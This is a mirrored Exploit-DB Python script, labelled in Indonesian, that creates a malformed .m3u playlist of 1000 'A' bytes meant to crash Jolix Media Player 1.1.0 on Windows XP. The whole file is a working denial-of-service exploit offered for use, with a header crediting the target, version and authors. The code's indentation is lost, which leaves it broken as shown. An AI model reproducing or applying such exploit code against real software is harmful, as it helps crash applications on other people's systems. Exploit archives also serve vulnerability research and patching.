exploit-db-mirror/exploits/windows/dos/26733.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

20 lines
No EOL
536 B
Python
Executable file

#!/usr/bin/python
print """
[+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit
[+]Celah versi: Version 1.1.0
[+]Mengunduh produk: http://www.jolixtools.com/downloads/jolix-media-player-setup.exe
[+]Hari Tanggal Tahun: 09.07.2013
[+]Penulis: IndonesiaGokilTeam
[+]Dicoba di sistem operasi: Windows xp sp 3
"""
sampah = "\x41" * 1000
ledakan = sampah
try:
rst= open("SampahMasyarakat.m3u",'w')
rst.write(ledakan)
rst.close()
print("\nFile Sampah Masyarakat dibuat !\n")
except:
print "Gagal"